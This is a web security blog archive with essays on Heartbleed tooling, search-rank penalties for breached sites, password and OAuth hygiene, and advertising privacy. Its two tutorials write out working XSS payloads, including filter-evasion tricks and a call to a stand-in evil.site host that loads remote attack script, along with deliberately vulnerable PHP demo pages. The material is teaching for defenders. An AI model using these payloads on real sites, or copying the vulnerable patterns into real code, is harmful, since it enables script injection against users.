Category Archives: web security

RSA APJ 2014, CDS-W07 Slides

Here are the slides for my presentation, Building and Breaking Privacy Barriers, at this year’s RSA Asia Pacific and Japan conference in Singapore.

The slides convey more theory than practical examples, but the ideas should come across without too much confusion. I expect to revisit the idea of a Rot network (a play on Tor) and toy with an implementation. Instead of blocking tracking bugs, the concept is to reduce their utility by sharing them across unrelated browsers — essentially polluting the data.

In any case, with this presentation over and out of the way, it’s time to start working on more articles!

A Monstrous Confluence

You taught me language, and my profit on’t

Is, I know how to curse: the red plague rid you,

For learning me your language!

Caliban, (The Tempest, I.ii.363-365)

The announcement of the Heartbleed vulnerability revealed a flaw in OpenSSL that could be exploited by a simple mechanism against a large population of targets to extract random memory from the victim. At worst, that pilfered memory would contain sensitive information like HTTP requests (with cookies, credentials, etc.) or even parts of the server’s private key. (Or malicious servers could extract similarly sensitive data from vulnerable clients.)

In the spirit of Shakespeare’s freckled whelp, I combined a desire to learn about Heartbleed’s underpinnings with my ongoing experimentation with the new language features of C++11. The result is a demo tool named Hemorrhage.

Hemorrhage shows two different approaches to sending modified TLS heartbeats. One relies on the Boost.ASIO library to set up a TCP connection, then handles the SSL/TLS layer manually. The other uses a more complete adoption of Boost.ASIO and its asynchronous capabilities. It was this async aspect where C++11 really shone. Lambdas made setting up callbacks a pleasure — especially in terms of readability compared to prior techniques that required binds and placeholders.

Readable code is hackable (in the creation sense) code. Being able to declare variables with auto made code easier to read, especially when dealing with iterators. Although hemorrhage only takes minimal advantage of the move operator and unique_ptr, they are currently my favorite aspects following lambdas and auto.

Hemorrhage itself is simple. Check out the README.md for more details about compiling it. (Hint: As long as you have Boost and OpenSSL it’s easy on Unix-based systems.)

The core of the tool is taking the tls1_heartbeat() function from OpenSSL’s ssl/t1_lib.c file and changing the payload length — essentially a one-line modification. Yet another approach might be to use the original tls1_heartbeat() function and modify the heartbeat data directly by manipulating the SSL* pointer’s s3->wrec data via the SSL_CTX_set_msg_callback().

In any case, the tool’s purpose was to “learn by implementing something” as opposed to crafting more insidious exploits against Heartbleed. That’s why I didn’t bother with more handshake protocols or STARTTLS. It did give me a better understanding of OpenSSL’s internals (of which I’ll add my voice to the chorus bemoaning its readability).

Now I’m off to other projects and more writing.

The Rank Decay Contingency

The idea: Penalize a site’s ranking in search engine results if the site suffers a security breach.

Now, for some background and details…

In December 2013 Target revealed that it had suffered a significant breach that exposed over 40 million credit card numbers. A month later it upped the count to 70 million and noted the stolen information included customers’ names, mailing addresses, phone numbers, and email addresses.

Does anybody care?

Or rather, what do they care about? Sure, the media likes stories about hacking, especially ones that affect millions of their readers. The security community marks it as another failure to point to. Banks will have to reissue cards and their fraud departments be more vigilant. Target will bear some costs. But will customers really avoid it to any degree?

Years ago, in 2007, a different company disclosed its discovery of a significant breach that affected at least 40 million credit cards. Check out the following graph of the stock price of the company (TJX Holdings) from 2006 to the end of 2013.

TJX Price 2006-2014

TJX Price 2006-2014

Notice the dip in 2009 and the nice angle of recovery. The company’s stock didn’t take a hit until 2009 when TJX announced terms of its settlement. The price nose-dived, only to steadily recover as consumers stopped caring and spent money (amongst any number of arbitrary reasons, markets not being as rational or objective as one might wish).

Consider who bears the cost of breaches like these. Ultimately, merchants pay higher fees to accept credit cards, consumers pay higher fees to have cards. And, yes, TJX paid in lost valuation over a rather long period (roughly a year), but only when the settlement was announced — not when the breach occurred. The settlement suggests that lax security has consequences, but a breach in and of itself might not.

Truth of Consequences

But what if a company weighs the costs of a breach as more favorable than the costs of increasing security efforts? What if a company doesn’t even deal with financial information and therefore has no exposure to losses related to fraud? What about companies that deal in personal information or data, like Snapchat?

Now check out another chart. The following data from Quantcast shows daily visitors to a lyrics site. The number is steady until one day — boom! — visits drop by over 60% when the site is relegated to the backwaters of search results.

RapGenius Quantcast Measure

Google caught the site (Rap Genius) undertaking sociopathic search optimization techniques like spreading link spam. Not only does spammy, vapid content annoy users, but Google ostensibly suffers by losing users who flee poor quality results for alternate engines. (How much impact it has on advertising revenue is a different matter.) Google loses revenue if advertisers care about where the users are or they perceive the value of users to be low.

The two previous charts have different time scales and measure different dimensions. But there’s an underlying sense that they reflect values that companies care about.

Rank Decay

Think back to the Target breach. (Or TJX, or any one of many breaches reported over the years, whether they affected passwords or credit cards.)

What if a penalty affected a site’s ranking in search results? For example, it could be a threshold for the “best” page in which it could appear, e.g. no greater than the fourth page (where pages are defined as blocks of N results, say 10). Or an absolute rank, e.g. no higher than the 40th entry in a list.

The penalty would decay over time at a rate, linear or exponential, based on any number of mathematical details. For example, a page-based penalty might decay by one page per month. A list-based penalty might decay by one on a weekly basis.

The decay rate could be influenced by steps the site takes to remediate the underlying problem that led to the breach, improvements to a privacy policy, fines, or covering costs related to fraud as a result of the breach.

If the search engines drives a significant portion of traffic — that results in revenue or influences valuation — then this creates an incentive for the site to maintain strong security. It’s like PCI with different teeth. It might incentivize the site to react promptly to breaches. At least one hopes.

But such a proposal could have insidious consequences.

Rank Implications

Suppose a site were able to merely buy advertising to artificially offset the rank penalty? After a breach you could have a search engine that’d love to penalize the “natural” ranking of a site only to rake in money as the site buys advertising to overcome the penalty. It’s not a smart idea to pay an executioner per head, let alone combine the role with judge and jury.

A penalty that a company fears might be one for which it suppresses the penalty’s triggers. Keeping a breach secret is a disservice to consumers. And companies subject to the S.E.C. may be required to disclose such events. But rules (and penalties) need to be clear in order to minimize legal maneuvering through loopholes.

The proposal also implies that a search engine has a near monopoly on directing traffic. Yes, I’m talking about Google. The hand waving about “search engines” is supposed to include sites like Yahoo! and Bing, even DuckDuckGo. But if you’re worried about one measure, it’s likely the Google PageRank. This is a lot of power for a company that may wish to direct traffic to its own services (like email, shopping, travel, news, etc.) in preference to competing ones.

It could also be that the Emperor wears no clothes. Google search and advertisements may not be the ultimate arbiter of traffic that turns into purchases. Strong, well-established sites may find that the traffic that drives engagement and money comes just as well from alternate sources like social media. Then again, losing any traffic source may be something no site wants to suffer.

Target is just the most recent example of breaches that will not end. Even so, Target demonstrated several positive actions before and after the breach:

– Transparency — periodic updates on breach details, remediation steps, complaint process.

– A clear privacy policy — written in accessible language (i.e. avoids a legal style that, however accurate, may be too dense, misleading, or ambiguous), including a summary of changes.

Thankfully, there were no denials, diminishing comments, or signs of incompetence on the part of Target. Breaches are inevitable for complex, distributed systems. Beyond prevention, goals should be minimizing their time to discovery and maximizing their containment.

And whether this rank idea decays from indifference or infeasibility, its sentiment should persist.

Audit Accounts, Partition Passwords, Stay Secure

It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner of bad habits.

It’s good Operations Security (OpSec) to avoid password reuse across your accounts. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.
Penny-Farthing
At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.

And if you’re still using the password kar120c I salute your sci-fi dedication, but pity your password creation skills.

Start with a list of all the sites for which you have an account. In order to make this easier to review in the future, create a specific bookmarks folder for these in your browser.

Each account should have a unique password. The latest Safari, for example, can suggest these for you.

Next, consider improving account security through the following steps.

Consider Using OAuth — Passwords vs. Privacy

Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identify to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.

If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.

But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing auth to a provider as well as how much providers share data.

Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.

Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forego OAuth and set up a password-based account.

(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)

Two-Factor Auth — One Equation in Two Unknowns

Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.

Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.

A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.

The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.

The two factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.

Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater

If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).

If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.

If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.

Review Your OAuth Grants

For sites you use as OAuth providers (like Facebook, Twitter, Linkedin, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.

Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.

Use HTTPS

Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have set this by default. If the site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of these accounts becomes paramount.

Maintain Constant Vigilance

Watch out for fake OAuth prompts, such as windows that spoof Facebook and Twitter.
Keep your browser secure.
Keep your system up to date.
Set a reminder to go through this all over again a year from now — if not earlier.

Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being.

Soylent Grün ist Menschenfleisch

Silicon Valley green is made of people. This is succinctly captured in the phrase: When you don’t pay for the product, the product is you. It explains how companies attain multi-billion dollar valuations despite offering their services for free. They promise revenue through the glorification of advertising.

Investors argue that high valuations reflect a company’s potential for growth. That growth comes from attracting new users. Those users in turn become targets for advertising. And sites, once bastions of clean design, become concoctions of user-generated content, ad banners, and sponsored features.

Population Growth

Sites measure their popularity by a single serving size: the user. Therefore, one way to interpret a company’s valuation is in its price per user. That is, how many calories can a site gain from a single serving? How many servings must it consume to become a hulking giant of the web?
Dystopian Books
You know where this is going.

The movie Soylent Green presented a future where a corporation provided seemingly beneficent services to a hungry world. It wasn’t the only story with themes of overpopulation and environmental catastrophe to emerge from the late ’60s and early ’70s. The movie was based on the novel Make Room! Make Room!, by Harry Harrison. And it had peers in John Brunner’s Stand on Zanzibar (and The Sheep Look Up) and Ursula K. Le Guin’s The Lathe of Heaven. These imagined worlds contained people powerful and poor. And they all had to feed.

A Furniture Arrangement

To sell is to feed. To feed is to buy.

In Soylent Green, Detective Thorn (Charlton Heston) visits an apartment to investigate the murder of a corporation’s board member, i.e. someone rich. He is unsurprised to encounter a woman there and, already knowing the answer, asks if she’s “the furniture.” It’s trivial to decipher this insinuation about a woman’s role in a world afflicted by overpopulation, famine, and disparate wealth. That an observation made in a movie forty years ago about a future ten years hence rings true today is distressing.

We are becoming products of web sites as we become targets for ads. But we are also becoming parts of those ads. Becoming furnishings for fancy apartments in a dystopian New York.

Woman have been components of advertising for ages, selected as images relevant to manipulating a buyer no matter how irrelevant their image is to the product. That’s not changing. What is changing is some sites’ desire to turn all users into billboards. They want to create endorsements by you that target your friends. Your friends are as much a commodity as your information.

In this quest to build advertising revenue, sites also distill millions of users’ activity into individual recommendations of what they might want to buy or predictions of what they might be searching for.

And what a sludge that distillation produces.

There may be the occasional welcome discovery from a targeted ad, but there is also an unwelcome consequence of placing too much faith in algorithms. A few suggestions can become dominant viewpoints based more on others’ voices than personal preferences. More data does not always mean more accurate data.

We should not excuse an algorithm as an impartial oracle to society. They are tuned, after all. And those adjustments may reflect the bias and beliefs of the adjusters. For example, an ad campaign created for UN Women employed a simple premise: superimpose upon pictures of women a search engine’s autocomplete suggestions for phrases related to women. The result exposes biases reinforced by the louder voices of technology. More generally, a site can grow or die based on a search engine’s ranking. An algorithm collects data through a lens. It’s as important to know where the lens is not focused as much as where it is.

There is a point where information for services is no longer a fair trade. Where apps collect the maximum information to offer the minimum functionality. There should be more of a push for apps that work on an Information-to-Functionality relationship of minimum requested for the maximum required.

Going Home

In the movie, Sol (Edward G. Robinson) talks about going Home after a long life. Throughout the movie, Home is alluded to as the ultimate, welcoming destination. It’s a place of peace and respect. Home is where Sol reveals to Detective Thorn the infamous ingredient of Soylent Green.

Web sites want to be your home on the web. You’ll find them exhorting you to make their URL your browser’s homepage.
Home Page
Web sites want your attention. They trade free services for personal information. At the very least, they want to sell your eyeballs. We’ve seen aggressive escalation of this in various privacy grabs, contact list pilfering, and weak apologies that “mistakes were made.”

More web sites and mobile apps are releasing features outright described as “creepy but cool” in the hope that the latter outweighs the former in a user’s mind. Services need not be expected to be free without some form of compensation; the Web doesn’t have to be uniformly altruistic. But there’s growing suspicion that personal information and privacy are being undervalued and under-protected by sites offering those services. There should be a balance between what a site offers to users and how much information it collects about users (and how long it keeps that information).

The Do Not Track effort fizzled, hobbled by indecision of a default setting. Browser makers have long encouraged default settings that favor stronger security, they seem to have less consensus about what default privacy settings should be.

Third-party cookies will be devoured by progress; they are losing traction within the browser and mobile apps. Safari has long blocked them by default. Chrome has not. Mozilla has considered it. Their descendants may be cookie-less tracking mechanisms, which the web titans are already investigating. This isn’t necessarily a bad thing. Done well, a tracking mechanism can be limited to an app’s sandboxed perspective as opposed to full view of a device. Such a restriction can limit the correlation of a user’s activity, thereby tipping the balance back towards privacy.

If you rely on advertising to feed your company and you do not control the browser, you risk going hungry. For example, only Chrome embeds the Flash plugin. A plugin that eternally produces vulnerabilities while coincidentally playing videos for a revenue-generating site.

Lightbeam ExampleThere are few means to make the browser an agent that prioritizes a user’s desires over a site’s. The Ghostery plugin is an active counteraction to tracking; it’s available for all the major browsers. Mozilla’s Lightbeam does not block tracking mechanisms by default; it reveals how interconnected tracking has become due to ubiquitous cookies.

Browsers are becoming more secure, but they need a site’s cooperation to protect personal information. At the very least, sites should be using HTTPS to protect traffic as it flows from browser to server. To do so is laudable yet insufficient for protecting data. And even this positive step moves slowly. Privacy on mobile devices moves perhaps even more slowly. The recent iOS 7 finally forbids apps from accessing a device’s unique identifier, while Android struggles to offer comprehensive tools.

The browser is Home. Apps are Home. These are places where processing takes on new connotations. This is where our data becomes their food.

Soylent Green’s year 2022 approaches. Humanity must know.

Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two DemonsAn ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value=”abc”> into <input value=”abc”><script>alert(9)</script><“”>

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


https://web.site/productDetails.html?id=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by it’s true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). JQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit, this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we used the Selector to obtain a collection of elements, then iterated through the collection with the .each() function. Since we specified a :first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers — prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.x=logb(by)

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform running. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear — at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s=”><script>alert(9)<script>

As a consequence of the non-numeric payload, the intval() has nothing to cast to an integer, so the greater than zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19″><script>alert(9)<script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s["a"]=19
http://web.site/intval.php?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output; it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.

We’ll end here. It’s time to convert some hours into much-needed sleep.

Cheap Essential Scenery

Keep Calm and Never MindThis October people who care about being aware of security in the cyberspace of their nation will celebrate the 10th anniversary of National Cyber Security Awareness Month. (Ignore the smug octal-heads claiming preeminence in their 12th anniversary.) Those with a better taste for acronyms will celebrate Security & Privacy Awareness Month.

For the rest of information security professionals it’s just another TUESDAY (That Usual Effort Someone Does All Year).

In any case, expect the month to ooze with lists. Lists of what to do. Lists of user behavior to be reprimanded for. What software to run, what to avoid, what’s secure, what’s insecure. Keep an eye out for inconsistent advice among it all.

Ten years of awareness isn’t the same as 10 years of security. Many attacks described decades ago in places like Phrack and 2600 either still work today or are clear antecedents to modern security issues. (Many of the attitudes haven’t changed, either. But that’s for another article.)

Web vulns like HTML injection and SQL injection have remained fundamentally unchanged across the programming languages that have graced the web. They’ve been so static that the methodologies for exploiting them are sophisticated and mostly automated by now.

Awareness does help, though. Some vulns seem new because of awareness (e.g. CSRF and clickjacking) even though they’ve haunted browsers since the dawn of HTML. Some vulns just seem more vulnerable because there are now hundreds of millions of potential victims whose data slithers and replicates amongst the cyber heavens. We even have entire mobile operating systems designed to host malware. (Or is it the other way around?)

So maybe we should be looking a little more closely at how recommendations age with technology. It’s one thing to build good security practices over time; it’s another to litter our cyberspace with cheap essential scenery.

Here are two web security examples from which a critical eye leads us into a discussion about what’s cheap, what’s essential, and what actually improves security.

Cacheing Can’t Save the Queen

I’ve encountered recommendations that insist a web app should set headers to disable the browser cache when it serves a page with sensitive content. Especially when the page transits HTTP (i.e. an unencrypted channel) as well as over HTTPS.

That kind of thinking is deeply flawed and when offered to developers as a commandment of programming it misleads them about the underlying problem.

If you consider some content sensitive enough to start worrying about its security, you shouldn’t be serving it over HTTP in the first place. Ostensibly, the danger of allowing the browser to cache the content is that someone with access to the browser’s system can pull the page from disk. It’s a lot easier to sniff the unencrypted traffic in the first place. Skipping network-based attacks like sniffing and intermediation to focus on client-side threats due to cacheing ignores important design problems — especially in a world of promiscuous Wi-Fi.

Then you have to figure out what’s sensitive. Sure, a credit card number and password are pretty obvious, but the answer there is to mask the value to avoid putting the raw value into the browser in the first place. For credit cards, show the last 4 digits only. For the password, show a series of eight asterisks in order to hide both its content and length. But what about email? Is a message sensitive? Should it be cached or not? And if you’re going to talk about sensitive content, then you should be thinking of privacy as well. Data security does not equal data privacy.

And if you answered those questions, do you know how to control the browser’s cacheing algorithm? Are you sure? What’s the recommendation? Cache controls are not as straight-forward as they seem. There’s little worth in relying on cache controls to protect your data from attackers who’ve gained access to your system. (You’ve uninstalled Java and Flash, right?)

Browsers used to avoid cacheing any resource over HTTPS. We want sites to use HTTPS everywhere and HSTS whenever possible. Therefore it’s important to allow browsers to cache resources loaded via HTTPS in order to improve performance, page load times, and visitors’ subjective experiences. Handling sensitive content should be approached with more care than just relying on headers. What happens when a developer sets a no-cacheing header, but saves the sensitive content in the browser’s Local Storage API?

HttpOnly Is Pretty Vacant

Web apps litter our browsers with all sorts of cookies. This is how some companies get billions of dollars. Developers sprinkle all sorts of security measures on cookies to make them more palatable to privacy- and security-minded users. (And weaken efforts like Do Not Track, which is how some companies keep billions of dollars.)

The HttpOnly attribute was proposed in an era when security documentation about HTML injection attacks (a.k.a. cross-site scripting, XSS) incessantly repeated the formula of attackers inserting <img> tags whose src attributes leaked victims’ document.cookie values to servers under the attackers’ control. It’s not wrong to point out such an exploit method. However, as Stephen King repeated throughout the Dark Tower series, “The world has moved on.” Exploits don’t need to be cross-site, they don’t need <script> tags in the payload, and they surely don’t need a document.cookie to be effective.

If your discussion of cookie security starts and ends with HttpOnly and Secure attributes, then you’re missing the broader challenge of designing good authorization, authentication, and session handling mechanisms. If the discussion involves using the path attribute as a security constraint, then you shouldn’t be talking about cookies or security at all.

HttpOnly is a cheap attribute to throw on a cookie. It doesn’t prevent sniffing — use HTTPS everywhere for that (notice the repetition here?). It doesn’t really prevent attacks, just a single kind of exploit technique. Content Security Policy is a far more essential countermeasure. Let’s start raising awareness about that instead.

Problems

Easy security measures aren’t useless. Prepared statements are easy to use and pretty soundly defeat SQL injection; developers just choose to remain ignorant of them.

This month be extra wary of cheap security scenery and stale recommendations that haven’t kept up with the modern web. Ask questions. Look for tell-tale signs like they

